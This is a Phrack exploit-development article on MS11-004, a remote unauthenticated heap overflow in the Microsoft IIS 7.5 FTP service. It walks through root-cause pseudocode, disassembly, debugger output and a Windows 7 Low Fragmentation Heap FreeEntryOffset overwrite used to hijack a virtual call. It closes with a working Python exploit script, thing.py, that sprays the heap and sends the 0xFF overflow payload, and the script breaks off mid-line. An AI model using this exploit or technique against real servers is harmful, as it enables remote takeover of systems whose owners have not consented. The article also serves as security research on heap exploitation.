|
==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x0c of 0x13 |=-----------------------------------------------------------------------=| |=-------------=[ The Art of Exploitation ]=-----------------=| |=-----------------------------------------------------------------------=| |=-------------------=[ Exploiting MS11-004 ]=-----------------------=| |=----------=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----------=| |=-----------------------------------------------------------------------=| |=------------------------=[ by redpantz ]=----------------------------=| |=-----------------------------------------------------------------------=| --[ Table of Contents 1 - Introduction 2 - The Setup 3 - The Vulnerability 4 - Exploitation Primitives 5 - Enabling the LFH 6 - FreeEntryOffset Overwrite 7 - The Impossible 8 - Conclusion 9 - References 10 - Exploit (thing.py) --[ 1 - Introduction Exploitation of security vulnerabilities has greatly increased in difficulty since the days of the Slammer worm. There have been numerous exploitation mitigations implemented since the early 2000's. Many of these mitigations were focused on the Windows heap; such as Safe Unlinking and Heap Chunk header cookies in Windows XP Service Pack 2 and Safe Linking, expanded Encoded Chunk headers, Terminate on Corruption, and many others in Windows Vista/7 [1]. The widely deployed implementation of anti-exploitation technologies has made gaining code execution from vulnerabilities much more expensive (notice that I say "expensive" and not "impossible"). By forcing the attacker to acquire more knowledge and spend expansive amounts of research time, the vendor has made exploiting these vulnerabilities increasingly difficult. This article will take you through the exploitation process (read: EIP) of a heap overflow vulnerability in Microsoft IIS 7.5 (MS11-004) on a 32-bit, single-core machine. While the target is a bit unrealistic for the real-world, and exploit reliability may be a bit suspect, it does suffice in showing that an "impossible to exploit" vulnerability can be leveraged for code execution with proper knowledge and sufficient time. Note: The structure of this article will reflect the steps, in order, taken when developing the exploit. It differs from the linear nature of the actual exploit because it is designed to show the thought process during exploit development. Also, since this article was authored quite some time after the initial exploitation process, some steps may have been left out (i.e. forgotten); quite sorry about that. --[ 2 - The Setup A proof of concept was released by Matthew Bergin in December 2010 that stated there existed an unauthenticated Denial of Service (DoS) against IIS FTP 7.5, which was triggered on Windows 7 Ultimate [3]. The exploit appeared to lack precision, so it was decided further investigation was necessary. After creating a test environment, the exploit was run with a debugger attached to the FTP process. Examination of the error concluded it wasn't a DoS and most likely could be used to achieve remote code execution: BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_\ heap_failure_freelists_corruption PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption STACK_TEXT: 77f474cb ntdll!RtlpCoalesceFreeBlocks+0x3c9 77f12eed ntdll!RtlpFreeHeap+0x1f4 77f12dd8 ntdll!RtlFreeHeap+0x142 760074d9 KERNELBASE!LocalFree+0x27 72759c59 IISUTIL!BUFFER::FreeMemory+0x14 724ba6e3 ftpsvc!FTP_COMMAND::WriteResponseAndLog+0x8f 724beff8 ftpsvc!FTP_COMMAND::Process+0x243 724b6051 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2 724b76c7 ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4 724b772a ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17 7248f182 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c 724a56e6 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x89 724a58c1 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x24 724a4f8a ftpsvc!THREAD_MANAGER::ThreadManagerThread+0x42 76bf1194 kernel32!BaseThreadInitThunk+0xe 77f1b495 ntdll!__RtlUserThreadStart+0x70 77f1b468 ntdll!_RtlUserThreadStart+0x1b While simple write-4 primitives have been extinct since the Windows XP SP2 days [1], there was a feeling that currently known, but previously unproven techniques could be leveraged to gain code execution. Adding fuel to the fire was a statement from Microsoft stating that the issue "is a Denial of Service vulnerability and remote code execution is unlikely" [4]. With the wheels set in motion, it was time to figure out the vulnerability, gather exploitation primitives, and subvert the flow of execution by any means necessary... --[ 3 - The Vulnerability The first order of business was to figure out the root cause of the vulnerability. Understanding the root cause of the vulnerability was integral into forming a more refined and concise proof of concept that would serve as a foundation for exploit development. As stated in the TechNet article, the flaw stemmed from an issue when processing Telnet IAC codes [5]. The IAC codes permit a Telnet client to tell the Telnet server various commands within the session. The 0xFF character denotes these commands. TechNet also describes a process that requires the 0xFF characters to be 'escaped' when sending a response by adding an additional 0xFF character. Now that there is context around the vulnerability, the corresponding crash dump can be further analyzed. Afterwards we can open the binary in IDA Pro and attempt to locate the affected code. Unfortunately, after statically cross-referencing the function calls from the stack trace, there didn't seem to be any functions that performed actions on Telnet IAC codes. While breakpoints could be set on any of the functions in the stack trace, another path was taken. Since the public symbols named most of the important functions within the ftpsvc module, it was deemed more useful to search the function list than set debugger breakpoints. A search was made for any function starting with 'TELNET', resulting in 'TELNET_STREAM_CONTEXT::OnReceivedData' and 'TELNET_STREAM_CONTEXT::OnSendData'. The returned results proved to be viable after some quick dynamic analysis when sending requests and receiving responses. The OnReceivedData function was investigated first, since it was the first breakpoint that was hit. Essentially the function attempts to locate Telnet IAC codes (0xFF), escape them, parse the commands and normalize the request. Unfortunately it doesn't account for seeing two consecutive IAC codes. The following is pseudo code for important portions of OnReceivedData: TELNET_STREAM_CONTEXT::OnReceivedData(char *aBegin, DATA_STEAM_BUFFER *aDSB, ...) { DATA_STREAM_BUFFER *dsb = aDSB; int len = dsb->BufferLength; char *begin = dsb->BufferBegin; char *adjusted = dsb->BufferBegin; char *end = dsb->BufferEnd; char *curr = dsb->BufferBegin; if(len >= 3) { //0xF2 == 242 == Data Mark if(begin[0] == 0xFF && begin[1] == 0xFF && begin[2] == 0xF2) curr = begin + 3; } bool seen_iac = false; bool seen_subneg = false; if(curr >= end) return 0; while(curr < end) { char curr_char = *curr; //if we've seen an iac code //look for a corresponding cmd if(seen_iac) { seen_iac = false; if(seen_subneg) { seen_subneg = false; if(curr_char < 0xF0) *adjusted++ = curr_char; } else { if(curr_char != 0xFA) { if(curr_char != 0xFF) { if(curr_char < 0xF0) { PuDbgPrint("Invalid command %c", curr_char) if(curr_char) *adjusted++ = curr_char; } } else { if(curr_char) *adjusted++ = curr_char; } } else { seen_iac = true; seen_subneg = true; } } } else { if(curr_char == 0xFF) seen_iac = true; else if(curr_char) *adjusted++ = curr_char; } curr++; } dsb->BufferLength = adjusted - begin; return 0; } The documentation states Telnet IAC codes can be used by: "Either end of a Telnet conversation can locally or remotely enable or disable an option". The diagram below represents the 3-byte IAC command within the overall Telnet connection stream: 0x0 0x2 -------------------------------- [IAC][Type of Operation][Option] -------------------------------- Note: The spec should have been referenced before figuring out the vulnerability, instead of reading the code and attempting to figure out what could go wrong. Although there is code to escape IAC characters, the function does not except to see two consecutive 0xFF characters in a row. Obviously this could be a problem, but it didn't appear to contain any code that would result in overflow. Thinking about the TechNet article recalled the line 'error in the response', so the next logical function to examine was 'OnSendData'. Shortly into the function it can be seen that OnSendData is looking for IAC (0xFF) codes: .text:0E07F375 loc_E07F375: .text:0E07F375 inc edx .text:0E07F376 cmp byte ptr [edx], 0FFh .text:0E07F379 jnz short loc_E07F37C .text:0E07F37B inc edi .text:0E07F37C .text:0E07F37C loc_E07F37C: .text:0E07F37C cmp edx, ebx .text:0E07F37E jnz short loc_E07F375 ; count the number ; of "0xFF" characters The following pseudo code represents the integral pieces of OnSendData: TELNET_STREAM_CONTEXT::OnSendData(DATA_STREAM_BUFFER *dsb) { char *begin = dsb->BufferBegin; char *start = dsb->BufferBegin; char *end = dsb->BufferEnd; int len = dsb->BufferLength; int iac_count = 0; if(begin + len == end) return 0; //do a total count of the IAC codes do { start++; if(*start == 0xFF) iac_count++; } while(start < end); if(!iac_count) return 0; for(char *c = begin; c != end; *begin++ = *c) { c++; if(*c == 0xFF) *begin++ == 0xFF; } return 0; } As you can see, if the function encounters a 0xFF that is NOT separated by at least 2-bytes then there is a potential to escape the code more than once, which will eventually lead to a heap corruption into adjacent memory based on the size of the request and amount of IAC codes. For example, if you were to send the string "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" to the server, OnReceivedData produces the values: 1) Before OnReceivedData a. DSB->BufferLength = 8 b. DSB->Buffer = "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" 2) After OnReceivedData a. DSB->BufferLength = 4 b. DSB->Buffer = "\xBB\xFF\xBB\xFF" Although OnReceivedData attempted to escape the IAC codes, it didn't expect to see multiple 0xFFs within a certain range; therefore writing the illegitimate values at an unacceptable range for OnSendData. Using the same string from above, OnSendData would write multiple 0xFF characters past the end of the buffer due to de-synchronization in the reading and writing into the same buffer. Now that it is known that a certain amount of 0xFF characters can be written past the end of the buffer, it is time to think about an exploitation strategy and gather primitives... --[ 4 - Exploitation Primitives Exploitation primitives can be thought of as the building blocks of exploit development. They can be as simple as program functionality that produces a desired result or as complicated as a 1-to-n byte overflow. The section will cover many of the primitives used within the exploit. In-depth knowledge of the underlying operating system usually proves to be invaluable information when writing exploits. This holds true for the IIS FTP exploit, as intricate knowledge of the Windows 7 Low Fragmentation Heap served as the basis for exploitation. It was decided that the FreeEntryOffset Overwrite Technique [2] would be used due to the limited ability of the attacker to control the contents of the overflow. The attack requires the exploiter to enable the low fragmentation heap, position a chunk under the exploiter's control before a free chunk (implied same size) within the same UserBlock, write at least 10 bytes past the end of its buffer, and finally make two subsequent requests that are serviced from the same UserBlock. [Yes, it's just that easy ;)] The following diagram shows how the FreeEntryOffset is utilized when making allocations. The first allocation comes from a virgin UserBlock, setting the FreeEntryOffset to the first two-byte value stored in the current free chunk. Notice there is no validation when updating the FreeEntryOffset. For MUCH more information on the LFH and exploitation techniques please see the references section: Allocation 1 FreeEntryOffset = 0x10 --------------------------------- |Header|0x10| Free | --------------------------------- |Header|0x20| Free | --------------------------------- |Header|0x30| Free | --------------------------------- Allocation 2 FreeEntryOffset = 0x20 --------------------------------- |Header| Used | --------------------------------- |Header|0x20| Free | --------------------------------- |Header|0x30| Free | --------------------------------- Allocation 3 FreeEntryOffset = 0x30 --------------------------------- |Header| Used | --------------------------------- |Header| Used | --------------------------------- |Header|0x30| Free | --------------------------------- Now look at the allocation sequence if we have the ability to overwrite a FreeEntryOffset with 0xFFFF: Allocation 1 FreeEntryOffset = 0x10 --------------------------------- |Header|0x10| Free | --------------------------------- |Header|0x20| Free | --------------------------------- |Header|0x30| Free | --------------------------------- Allocation 2 FreeEntryOffset = 0x20 --------------------------------- |Header|FFFFFFFFFFFFFFF | --------------------------------- |Header|FFFF| Free | --------------------------------- |Header|0x30| Free | --------------------------------- Allocation 3 FreeEntryOffset = 0xFFFF --------------------------------- |Header| Used | --------------------------------- |Header| Used | --------------------------------- |Header|0x30| Free | --------------------------------- As you can see, if we can overwrite the FreeEntryOffset with a value of 0xFFFF then our next allocation will come from unknown heap memory at &UserBlock + 8 + (8 * (FreeEntryOffset & 0x7FFF8)) [2]. This may or may not point to committed memory for the process, but still provides a good starting point for turning a semi-controlled overwrite to a fully-controlled overwrite. --[ 5 - Enabling the LFH If you have read 'Understanding the Low Fragmentation Heap' [2] you'll know that it has 'lazy' activation, which means, although it is the default front-end allocator, it isn't enabled until a certain threshold is exceeded. The most common trigger for enabling the LFH is 16 consecutive allocations of the same size. for i in range(0, 17): name = "lfh" + str(i) payload = gen_payload(0x40, "X") lfhpool.alloc(name, payload) You would assume that after making the aforementioned requests LFH->HeapBucket[0x40] would be enabled and all further requests for size 0x40 would be serviced via the LFH; unfortunately this was not the case. This lead to some memory profiling using Immunity Debugger's '!hippie' command. After creating and sending many commands and logging heap allocations, a pattern of 0x100 byte allocations emerged. This was quite peculiar because requests of 0x40 bytes were being sent. Tracing the allocations for 0x100 found that the main consumer of the 0x100 byte allocations was FTP_SESSION::WriteResponseHelper; our binary audit can finally start! Note: If some thought would have been put in before brute forcing sizes it would have been noted that this is a C++ application which means that request data was most likely kept in some buffer or string class; instead of being allocated to a specific request size. Low and behold, looking at the WriteResponseHelper function validated our speculation. The function used a buffer class that would allocate 0x100 bytes and extend itself when necessary: .text:0E074E7A mov eax, [ebp+arg_C] ; dword ptr [eax] == request string .text:0E074E7D push edi .text:0E074E7E mov edi, [ebp+arg_8] .text:0E074E81 mov [ebp+vFtpRequest], eax .text:0E074E87 mov esi, 100h .text:0E074E8C push esi ; init_size == 0x100 .text:0E074E8D lea eax, [ebp+var_204] .text:0E074E93 mov [ebp+var_27C], ecx .text:0E074E99 push eax .text:0E074E9A lea ecx, [ebp+var_234] .text:0E074EA0 call ds:STRA::STRA(char *,ulong) Next, there is a loop to determine if the normalized request string can fit in the STRA object: .text:0E074F59 call ds:STRA::QuerySize(void) .text:0E074F5F add eax, eax .text:0E074F61 push eax .text:0E074F62 lea ecx, [ebp+vSTRA1] .text:0E074F68 call ds:STRA::Resize(ulong) Finally, the STRA object will append the user request data to the server response code (for example: "500 "): .text:0E0750B4 push [ebp+vFtpRequest] .text:0E0750BA call ds:STRA::Append(char const *) ; this is where the ; resize happens .text:0E0750C0 mov esi, eax .text:0E0750C2 cmp esi, ebx .text:0E0750C4 jl loc_E07515F ; if(!STRA::Apend(vFtpRequest)) ; { destory_objects(); } .text:0E0750CA push offset SubStr ; "\r\n" .text:0E0750CF lea ecx, [ebp+var_234] .text:0E0750D5 call ds:STRA::Append(char const *) Looking into the STRA:Append(char const*) function, a constant value is added when there is not enough space to append to the current STRA object: .text:6C9DAAE7 cmp ebx, edx .text:6C9DAAE9 ja short loc_6C9DAB3D ; if enough room, copy ; and update size .text:6C9DAAEB jb short loc_6C9DAAF2 ; otherwise add 0x80 ; and resize the BUFFER .text:6C9DAAED cmp [edi+24h], esi .text:6C9DAAF0 jnb short loc_6C9DAB3D .text:6C9DAAF2 .text:6C9DAAF2 loc_6C9DAAF2: .text:6C9DAAF2 xor esi, esi .text:6C9DAAF4 cmp [ebp+arg_C], esi .text:6C9DAAF7 jz short loc_6C9DAB00 .text:6C9DAAF9 add eax, 80h ; eax = buffer.size Finally the buffer is resized if necessary and the old data is copied over: .text:6C9DAB1B push eax ; uBytes .text:6C9DAB1C mov ecx, edi .text:6C9DAB1E call ?Resize@BUFFER@@QAEHI@Z ; BUFFER::Resize(uint) .text:6C9DAB23 test eax, eax .text:6C9DAB25 jnz short loc_6C9DAB3D .text:6C9DAB27 call ds:__imp_GetLastError .text:6C9DAB2D cmp eax, esi .text:6C9DAB2F jle short loc_6C9DAB64 .text:6C9DAB31 and eax, 0FFFFh .text:6C9DAB36 or eax, 80070000h .text:6C9DAB3B jmp short loc_6C9DAB64 .text:6C9DAB3D .text:6C9DAB3D loc_6C9DAB3D: .text:6C9DAB3D .text:6C9DAB3D mov ebx, [ebp+Size] .text:6C9DAB40 mov eax, [edi+20h] .text:6C9DAB43 mov esi, [ebp+arg_8] .text:6C9DAB46 push ebx ; Size .text:6C9DAB47 push [ebp+Src] ; Src .text:6C9DAB4A add eax, esi .text:6C9DAB4C push eax ; Dst .text:6C9DAB4D call memcpy Now that it is known buffers will be sized in multiples of 0x80 (i.e. 0x100, 0x180, 0x200, etc), the LFH can be activated accordingly (by size). The size of 0x180 was chosen because 0x100 is used for most, if not all, initial responses, but _any_ valid size could be used. for i in range(0, LFHENABLESIZE): name = "lfh" + str(i) payload = gen_payload(0x180, "X") lfhpool.alloc(name, payload) --[ 6 - FreeEntryOffset Overwrite It has already been verified that the vulnerability results in an overflow of 0xFF characters into an adjacent heap chunk. Therefore the ability to enable the LFH for a certain size results in the trivial overwriting of an adjacent FreeEntryOffset. For this exploitation technique to work, the LFH must be enabled while ensuring that the UserBlock maintains a few free chunks to service requests necessary for exploitation. Fortunately, this was quite easy to guarantee while on a single core machine: for i in range(0, LFHENABLESIZE): name = "lfh" + str(i) payload = gen_payload(0x180, "X") lfhpool.alloc(name, payload) print "[*] Sending overflow payload" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) data = s.recv(1024) buf = "\xff\xbb\xff\xff" * 112 + "\r\n" #ends up allocation 0x180 #(0x188 after chunk header) print "[*] Sending %d 0xFFs in the whole payload" % countff(buf) print "[*] Sending Payload...(%d bytes)" % len(buf) analyze(buf) s.send(buf) s.close() These small portions of code are enough to enable the LFH and overwrite a free adjacent chunk after the overflow-able piece of memory. Now when subsequent allocations are made for 0x180 bytes, a bad free entry offset will be used, providing the application with unexpected memory for appending the response. The above describes the following: FreeEntryOffset = 0x1 0 1 2 3 [UsedChunk][FreeChunk][OverflowedChunk][FreeChunk] . . . [UnknownMemory @ UserBlock + (0xFFFF * 8)] Three subsequent allocations will accomplish the following: 1) Allocate FreeChunk at FreeEntryOffset 0x1 2) Allocate OverflowedChunk (which is also free) updating the FreeEntryOffset to 0xFFFF 3) Allocate memory at UserBlock + 0xFFFF (instead of offset 0x3) This means the bad FreeEntryOffset will result in data being completely controlled by the attacker. Note: Although quite easily achieved on a single-core machine, heap determinism can be much harder on a multi-core platform. Determinism can be much more difficult because each core will effectively have its own UserBlocks, making chunk placement dependent on which thread services a request. While a multi-core machine doesn't make this vulnerability completely un-exploitable it does increase the difficulty and decrease the reliability. Overwriting the FreeEntryOffset with 0xFFFF has turned a limited heap overflow into a write-n, fully controlled overflow; since the heap chunk allocated will be 100% populated with user-controlled data. There is only one HUGE problem. What should be overwritten? This ended up being the most challenging and least reliable portion of the exploit and could still be further refined. --[ 7 - The Impossible In all honesty, the previous few steps were basic vulnerability analysis, rudimentary Python and requisite knowledge of Windows 7 heap internals. The most difficult and time consuming-portion is explained below. The techniques described below had varying degrees of reliability and might not even be the best choice for exploitation. The most valuable knowledge to take away will be the process of finding an object to overwrite and seeding those objects remotely within the heap. As stated previously, figuring out WHAT to overwrite is quite a problem. Not only does a sufficient object, function, or variable, need to be unearthed but that item needs to reside in memory where the 'bad' allocation points to. A starting point for locating what to overwrite began with the functions' list. The function list was chosen because public symbols were available, providing descriptive names for the most important functions. Also, since the application was written in C++ it was assumed that there would be virtual functions that stored function pointers somewhere in memory. The first noticeable item that looked redeeming was FTP_COMMAND class. The class will most certainly be instantiated when receiving new commands and also contains a vtable. .text:0E073B7D public: __thiscall FTP_COMMAND::FTP_COMMAND(void) proc near .text:0E073B7D mov edi, edi .text:0E073B7F push ebx .text:0E073B80 push esi .text:0E073B81 mov esi, ecx .text:0E073B83 push edi .text:0E073B84 lea ecx, [esi+0Ch] .text:0E073B87 mov dword ptr [esi], offset const FTP_COMMAND::`vftable' It also contained a function pointer that had the same name as one in our stack trace, albeit in a different class. .text:0E073C8D mov dword ptr [ebx+8], offset FTP_COMMAND::AsyncCompletionRoutine(FTP_ASYNC_CONTEXT *) Note: If the stack trace would have been examined more thoroughly, it would have been obvious that this wasn't the correct choice, as you will see below. At first glance this seemed to be the perfect fit. A breakpoint was set in ntdll!RtlpLowFragHeapAllocFromContext() after the initial overflow had occurred and appeared to be populated with FTP_COMMAND objects! Unfortunately, there didn't seem to be a remote command that could trigger a virtual function call within the FTP_COMMAND object at the time of an attacker's choosing. Note: Although summed up in one paragraph, this actually took quite some time to figure out, as the ability to overwrite a function pointer severely clouded judgment. Failure led to flailing around in an attempt to populate heap memory with objects that were remotely user-controlled without authentication. Eventually, the thought of each FTP_COMMAND having a specific session came to mind. The FTP_SESSION class was more closely examined (which was also in the stack trace; although this stack trace would eventually change with different heap layouts). The real question was 'Can this function be reliably triggered at given time X with user input Y?' Some testing took place and indeed, this server was truly asynchronous ;). FTP, being a lined based protocol, requires an end of line / end of command delimiter. The server will actually wait to process the command until it has received the entire line [6]. Perhaps a FTP_SESSION object that is associated with a FTP_COMMAND could be overwritten, leading to control of a virtual function call. Step tracing was used throughout FTP_COMMAND::WriteResponseWithErrorTextAndLog and ended up at the FTP_SESSION::Log() function. This function contained multiple virtual function calls such as: .text:0E0761C4 mov ecx, [edi+3D8h] .text:0E0761CA lea eax, [ebp+var_1B4] .text:0E0761D0 push eax ; int .text:0E0761D1 push [ebp+dwFlags] ; CodePage .text:0E0761D7 mov eax, [ecx] .text:0E0761D9 call dword ptr [eax+18h] Now that there is a potential known function pointer in memory to be overwritten, how can it be called? Surprisingly it was quite simple. By leaving the trailing '\n' off the end of a command, setting up the heap, and then sending the end of line delimiter, a call to "call dword ptr [eax+18h]" with full control of EAX could be triggered. 0:006> r eax=43434343 ebx=013f2a60 ecx=0145dc98 edx=0104f900 esi=013dfb98 edi=013f2a60 eip=70b661d9 esp=0104f690 ebp=0104f984 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ftpsvc!FTP_SESSION::Log+0x16b: 70b661d9 ff5018 call dword ptr [eax+18h] ds:0023:4343435b=???????? 0:006> k ChildEBP RetAddr 0104f984 70b6a997 ftpsvc!FTP_SESSION::Log+0x16b 0104fa30 70b6ee86 ftpsvc!FTP_COMMAND::WriteResponseWithErrorTextAndLog+0x188 0104fa48 70b66051 ftpsvc!FTP_COMMAND::Process+0xd1 0104fa88 70b676c7 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2 0104faf0 70b6772a ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4 0104fafc 70b3f182 ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17 0104fb08 70b556e6 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c Tracing the function during non-exploitation attempts revealed that the function was attempting to get the username (if one existed) for logging purposes. 1b561d9 ff5018 call dword ptr [eax+18h] ds:0023:71b23a38={ftpsvc!USER_SESSION::QueryUserName (71b37823)} Note: Again, this wasn't directly obvious by looking at the function. There was quite a bit of static and dynamic analysis to determine the function's usefulness. Although the ability to spray the heap with FTP_COMMAND and FTP_SESSION objects is possible, it is not as reliable as originally expected. Many factors such as number of connections, the low fragmentation heap setup (i.e. number of cores on the server) and many others come into play when attempting to exploit this vulnerability. For example, the amount of LFH chunks and the number of connections to the server ended up having quite an effect on the reliability of the exploit, which hovered around 60%. These both contributed to which address the misaligned allocation pointed and the contents of the memory. --[ 8 - Conclusion Although Microsoft and many others claimed that this vulnerability would be impossible to exploit for code execution, this paper shows that with the correct knowledge and enough determination, impossible turns to difficult. To recap the exploitation process: 1) Figure out the vulnerability 2) Familiarize oneself with how heap memory is managed 3) Obtain in-depth knowledge of the operating system's memory managers 4) Prime the LFH to a semi-deterministic state 5) Send a request to overflow an adjacent chunk on the LFH 6) Create numerous connections in an attempt to populate the heap with FTP_SESSION objects; which will create USER_SESSION objects as well 7) Send an unfinished request on the previously created connections 8) Make 3 allocations from the LFH for same size as your overflowable chunk a. 1st == Allocate and overflow into next chunk b. 2nd == FreeEntryOffset will be set to 0xFFFF c. 3rd == Allocation will (hopefully) point to memory which points to a FTP_SESSION object containing a USER_SESSION class; completely overwriting the function pointer in memory 9) Finish the command from the connection pool by sending a trailing '\n', which in turn calls the OverlappedCompletionRoutine(), therefore calling the FTP_SESSION::Log() function in the process 10) This will obtain EIP with multiple registers pointing to user-controlled data. From there ASLR and DEP will need to be subverted to gain code execution. Take a look at DATA_STREAM_BUFFER.Size, which will determine how many bytes are sent back to a user in a response Although full arbitrary code execution wasn't achieved in the exploit, it still proves that a remote attacker can potentially gain control over EIP via a remote unauthenticated FTP connection that can be used to subvert the security posture of the entire system, instead of limiting the scope to a denial of service. The era of simple exploitation is behind us and more exploitation primitives must be used when developing modern exploits. By having a strong foundation of operating system knowledge and exploitation techniques, you, too, can turn impossible bugs into exploitable ones. --[ 9 - References [1] - Preventing the exploitation of user mode heap corruption vulnerabilities (http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the- exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx) [2] - Understanding the Low Fragmentation Heap (http://illmatics.com/Understanding_the_LFH.pdf) [3] - Windows 7 IIS 7.5 FTPSVC Denial Of Service (http://packetstormsecurity.org/files/96943/ Windows-7-IIS-7.5-FTPSVC-Denial-Of-Service.html) [4] - Assessing an IIS FTP 7.5 Unauthenticated Denial of Service Vulnerability (http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis- ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx) [5] - The Telnet Protocol (http://support.microsoft.com/kb/231866) [6] - Synchronization and Overlapped Input and Output (http://msdn.microsoft.com/en-us/library/windows/desktop/ ms686358(v=vs.85).aspx) --[ 10 - Exploit (thing.py) import socket, sys, os, time #Connection Info HOST = "192.168.11.129" PORT = 21 WAITP = 1 #Good Combo (60% reliability) #LFHENABLESIZE = 0x78 #CONNCOUNT = 0x103 #=> FTP_SESSION::Log+0x16B #call dword ptr [eax+18h] ds:0023:2424243c=???????? #The number of allocations to enabled the LFH for our chosen size LFHENABLESIZE = 0x78 LFHPOOLSIZE = LFHENABLESIZE + 0x3 #Each connection will create X amount of FTP_SESSION objects, which #contain the virtual function we're trying to overwrite. CONNCOUNT = 0x103 class SoftAlloc: s = 0 #Notice that the connection doesn't do a 'self.s.recv()' #This is a way to restrict un-needed calls to the completionroute def setup(self): self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.connect((HOST, PORT)) def alloc(self, data): self.s.send(data) def complete(self): self.buf = self.s.recv(1024) def free(self): self.s.close() #Pools are just a way to keep track of connections #It could have just as easily been an array of sockets class SoftLeak: def __init__(self): self.stag = {} self.untagged = [] def create_pool(self, num): for i in range(0, num): sa = SoftAlloc() sa.setup() self.untagged.append(sa) def clear_pool(self): while(len(self.untagged) > 0): sa = self.untagged.pop() sa.free() def alloc(self, tag, payload): if tag in self.stag: print "Error: Tag in use %s\n" % tag sys.exit() if len(self.untagged) > 0: sa = self.untagged.pop() self.stag[tag] = sa sa.alloc(payload) def realloc(self, tag, payload): if tag in self.stag: sa = self.stag[tag] sa.alloc(payload) def complete(self, tag): if tag in self.stag: sa = self.stag[tag] sa.complete() def free(self, tag): if tag not in self.stag: print "Error: Unknown tag %s\n" % tag sys.exit() sa = self.stag[tag] del self.stag[tag] sa.free() def countff(payload): count = 0 for x in payload: if x == "\xff" or x == "\xFF": count += 1 return count def analyze(payload): if len(payload) < 0x100: return first = payload[0:0x100] first_ffs = countff(first) print "[*] Sending %d 0xFFs in the 1st chunk" % first_ffs second = payload[0x100:] second_ffs = countff(second) print "[*] Sending %d 0xFFs in the 2nd chunk" % second_ffs #allocations have 0x80 added to them, making sizes < 0x81 hard to allocate def gen_payload(size, ch): if size < 0x80: print "Invalid allocation size" sys.exit(1) if size > 0x180 and size < 0x200: print "WARNING: Only allocating 0x180 bytes" new_size = size - 0x80 #print "Payload will be %d bytes" % (new_size) return (ch * new_size) def main(): #create the initial amount of connections print "[*] Creating LFHPOOL" lfhpool = SoftLeak() lfhpool.create_pool(LFHPOOLSIZE) time.sleep(WAITP) ###################################################################### #Go through LFHENABLESIZE connections, and make an allocation of a #certain size. This will enable the LFH for size provided in #'gen_payload()' ###################################################################### for i in range(0, LFHENABLESIZE): name = "lfh" + str(i) payload = gen_payload(0x180, "X") lfhpool.alloc(name, payload) ####################################################################### #Send out exploit payload, this should be of the same subsegment as the #chunks we put in the LFH. It will write 0xFFs over the FreeEntryOffset #stored in the 1st two bytes of a free chunk in the LFH #Note: Although it actually sends a payload of 0x1C0, it will only #allocate 0x180 bytes of data to be used for this transaction #Note2: This LFH chunk will be freed, hence in the section below #requiring 3 allocations instead of the two necessary for the #FreeEntryOffset overwrite ####################################################################### print "[*] Sending overflow payload" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) data = s.recv(1024) buf = "\xff\xbb\xff\xff" * 112 + \ "\r\n" #ends up allocation 0x180 (0x188 after chunk header) print "[*] Sending %d 0xFFs in the whole payload" % countff(buf) print "[*] Sending Payload...(%d bytes)" % len(buf) analyze(buf) s.send(buf) s.close() #create the initial amount of connections print "[*] Creating CONNPOOL" connpool = SoftLeak() connpool.create_pool(CONNCOUNT) time.sleep(WAITP) ####################################################################### #The LFH UserBlock should look like this #[previously_allocated_chunk][overwritten_chunk][malicious_chunk] #1) We have to make an allocation for the chunk that was used in the #overflow (since it was freed) #2) 'overwritten_chunk' should be all 0xFFs (including its #_HEAP_ENTRY header) #3) the 'malicious_chunk' will use a FreeEntryOffset of 0xFFFF (saved #from previous allocation) # #Now we can allocate a bunch of FTP_CONTROL_CHANNEL objects (see #ftpsvc.dll) These will be in the heap, so when we add "UserBlocks + #(0x7FFF8 * 8)" it will point to heap memory that contains a #FTP_CONTROL_CHANNEL object, which has a vtable as its first 4 bytes # #If the trailing '\n' is missing from the ftp command the function #FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine() will not be called #until it sees the final '\n', which gives us control over WHEN the #call will be made ####################################################################### print "[*] Sending 0x%X USER commands" % CONNCOUNT for i in range(0, CONNCOUNT): name = "ftpcmd" + str(i) connpool.alloc(name, "USER ") ####################################################################### #1st: allocates a chunk saving its NextOffset # - NextOffset = The one after our 'malicious_chunk' #2nd: allocates another, saving the tainted offset (0xFFFF) # - NextOffset = 0xFFFF #3rd: will actually use the incorrect offset # - Return value will be addr_of(UserBlock) + (0x7FFF8 * 8) # - This is due to how the FreeEntryOffset is calculated # #The '$' * 0x170 will allocate 0x180 bytes, but will also be the data #used to overwrite the USER_SESSION objected called during logging #The '$' characters would be replaced with values to start a ROP sled ####################################################################### curr_char = 0x40 for i in range(0, 3): curr_char += 1 name = "trigger" + str(i) payload = "$$$$ " + (chr(curr_char) * 0x170) #allocates 0x180 bytes print "[*] Sending payload%d of %d bytes" % (i, len(payload)) lfhpool.alloc(name, payload) ####################################################################### #By sending the trailing '\n' command, this will force the #FTP_CONTROL_CHANNEL to call its AsyncCompletionRoutine(), notifying #the server that the connection has been completed. Fortunately for us #this function pointer will have been overwritten by the 3rd iteration #in the code above "payload = "PASS " + 